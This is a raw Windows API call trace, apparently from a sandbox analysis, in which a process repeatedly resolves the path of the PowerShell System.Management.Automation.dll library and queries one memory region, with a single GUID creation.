	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.826] VirtualQuery (in: lpAddress=0x10b9d0, lpBuffer=0x10c890, dwLength=0x30 | out: lpBuffer=0x10c890*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] VirtualQuery (in: lpAddress=0x10b9d0, lpBuffer=0x10c890, dwLength=0x30 | out: lpBuffer=0x10c890*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.827] VirtualQuery (in: lpAddress=0x10b0c0, lpBuffer=0x10bf80, dwLength=0x30 | out: lpBuffer=0x10bf80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b150, lpBuffer=0x10c010, dwLength=0x30 | out: lpBuffer=0x10c010*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.828] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b500, lpBuffer=0x10c3c0, dwLength=0x30 | out: lpBuffer=0x10c3c0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.829] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.830] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.830] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x2ed0142a, Data2=0xd78a, Data3=0x4567, Data4=([0]=0xb5, [1]=0x6f, [2]=0xaf, [3]=0x5e, [4]=0x7a, [5]=0x11, [6]=0x9a, [7]=0x13))) returned 0x0
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] VirtualQuery (in: lpAddress=0x10b0c0, lpBuffer=0x10bf80, dwLength=0x30 | out: lpBuffer=0x10bf80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.833] VirtualQuery (in: lpAddress=0x10b150, lpBuffer=0x10c010, dwLength=0x30 | out: lpBuffer=0x10c010*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] VirtualQuery (in: lpAddress=0x10b370, lpBuffer=0x10c230, dwLength=0x30 | out: lpBuffer=0x10c230*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
